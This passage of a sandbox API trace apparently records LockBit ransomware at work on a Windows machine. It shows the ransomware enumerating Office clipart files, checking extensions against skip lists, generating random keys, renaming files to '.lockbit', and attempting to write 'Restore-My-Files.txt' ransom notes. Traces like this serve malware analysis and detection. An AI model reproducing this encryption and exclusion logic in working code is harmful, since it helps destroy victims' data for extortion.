nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0136.003] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0136.004] malloc (_Size=0xa6) returned 0x77d7a8 [0136.004] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0136.062] free (_Block=0x77d7a8) [0136.062] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0136.062] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0136.062] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0136.062] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbabe5400, ftCreationTime.dwHighDateTime=0x1bd732d, ftLastAccessTime.dwLowDateTime=0x65e1cad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbabe5400, ftLastWriteTime.dwHighDateTime=0x1bd732d, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0101866.BMP", cAlternateFileName="")) returned 1 [0136.062] lstrcmpiW (lpString1=".", lpString2="J0101866.BMP") returned -1 [0136.062] lstrcmpiW (lpString1="..", lpString2="J0101866.BMP") returned -1 [0136.063] PathFindExtensionW (pszPath="J0101866.BMP") returned=".BMP" [0136.063] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0136.063] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0136.063] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0136.063] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0136.063] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0136.063] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0136.064] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0136.064] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0101866.BMP") returned 1 [0136.064] lstrcmpiW (lpString1="ntldr", lpString2="J0101866.BMP") returned 1 [0136.064] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0101866.BMP") returned 1 [0136.064] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0101866.BMP") returned -1 [0136.064] lstrcmpiW (lpString1="autorun.inf", lpString2="J0101866.BMP") returned -1 [0136.064] lstrcmpiW (lpString1="thumbs.db", lpString2="J0101866.BMP") returned 1 [0136.065] lstrcmpiW (lpString1="iconcache.db", lpString2="J0101866.BMP") returned -1 [0136.065] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0136.065] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP") returned=".BMP" [0136.065] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0136.065] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0136.065] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0136.066] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0136.066] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0136.066] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0136.066] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0136.066] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP.lockbit") returned 72 [0136.066] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101866.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0136.067] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0136.067] malloc (_Size=0x40068) returned 0x3df0008 [0136.067] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=32184) returned 1 [0136.067] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0136.068] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0136.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0136.068] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0136.068] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0136.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0136.068] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0136.158] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0136.158] malloc (_Size=0xa6) returned 0x77d7a8 [0136.158] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0137.983] free (_Block=0x77d7a8) [0137.983] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0137.983] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0137.983] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0137.984] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa0dde00, ftCreationTime.dwHighDateTime=0x1bd732d, ftLastAccessTime.dwLowDateTime=0x56321b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xaa0dde00, ftLastWriteTime.dwHighDateTime=0x1bd732d, nFileSizeHigh=0x0, nFileSizeLow=0x7f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0101867.BMP", cAlternateFileName="")) returned 1 [0137.984] lstrcmpiW (lpString1=".", lpString2="J0101867.BMP") returned -1 [0137.984] lstrcmpiW (lpString1="..", lpString2="J0101867.BMP") returned -1 [0137.984] PathFindExtensionW (pszPath="J0101867.BMP") returned=".BMP" [0137.984] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0137.984] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0137.985] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0137.985] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0137.985] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0137.985] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0137.985] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0137.987] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0137.987] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0137.987] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0137.987] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0137.987] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0137.987] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0137.987] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0137.987] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0137.987] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0137.988] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0137.988] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0137.988] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0137.988] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0137.988] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0137.988] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0137.988] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0137.988] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0137.988] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0137.988] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0137.989] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0137.989] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0137.989] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0137.989] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0137.989] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0137.989] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0137.989] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0137.989] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0137.989] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0137.992] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0137.992] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0137.992] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0137.992] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0137.992] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0137.992] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0137.992] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0137.992] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0137.992] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0137.992] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0137.992] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0137.993] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0137.993] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0101867.BMP") returned 1 [0137.993] lstrcmpiW (lpString1="ntldr", lpString2="J0101867.BMP") returned 1 [0137.993] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0101867.BMP") returned 1 [0137.993] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0101867.BMP") returned -1 [0137.993] lstrcmpiW (lpString1="autorun.inf", lpString2="J0101867.BMP") returned -1 [0137.993] lstrcmpiW (lpString1="thumbs.db", lpString2="J0101867.BMP") returned 1 [0137.993] lstrcmpiW (lpString1="iconcache.db", lpString2="J0101867.BMP") returned -1 [0137.993] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0137.993] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned=".BMP" [0137.993] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0137.993] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0137.993] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0137.993] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0137.993] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0137.993] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0137.993] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0137.994] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0137.997] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0137.997] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0137.997] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0137.997] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0137.997] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0137.997] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0137.997] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0137.997] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0137.997] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0137.997] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0137.997] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0137.997] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0137.998] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0137.998] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0137.998] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0137.998] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0137.998] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0137.998] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0137.998] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0137.998] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0137.998] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP.lockbit") returned 72 [0137.998] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101867.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0138.003] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.003] malloc (_Size=0x40068) returned 0x3df0008 [0138.003] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=32616) returned 1 [0138.003] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.004] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.004] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.005] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.005] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.065] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.065] malloc (_Size=0xa6) returned 0x77d7a8 [0138.065] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.155] free (_Block=0x77d7a8) [0138.155] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.155] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.155] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.156] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e1cad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3ee8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0101980.WMF", cAlternateFileName="")) returned 1 [0138.159] lstrcmpiW (lpString1=".", lpString2="J0101980.WMF") returned -1 [0138.159] lstrcmpiW (lpString1="..", lpString2="J0101980.WMF") returned -1 [0138.159] PathFindExtensionW (pszPath="J0101980.WMF") returned=".WMF" [0138.159] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.159] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.159] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.159] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.159] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.159] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.159] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.159] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.159] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.159] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.160] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.161] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.161] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.161] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.161] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.161] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.161] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.161] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.161] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.161] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.161] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.161] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.161] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.161] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.161] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.162] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.162] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.162] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.162] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.162] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.162] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.162] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.162] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.162] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.162] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.162] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.162] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.164] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.164] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.164] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.164] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.164] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.164] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.164] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.164] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.164] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.164] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.164] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0101980.WMF") returned 1 [0138.164] lstrcmpiW (lpString1="ntldr", lpString2="J0101980.WMF") returned 1 [0138.164] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0101980.WMF") returned 1 [0138.164] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0101980.WMF") returned -1 [0138.164] lstrcmpiW (lpString1="autorun.inf", lpString2="J0101980.WMF") returned -1 [0138.164] lstrcmpiW (lpString1="thumbs.db", lpString2="J0101980.WMF") returned 1 [0138.165] lstrcmpiW (lpString1="iconcache.db", lpString2="J0101980.WMF") returned -1 [0138.165] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft 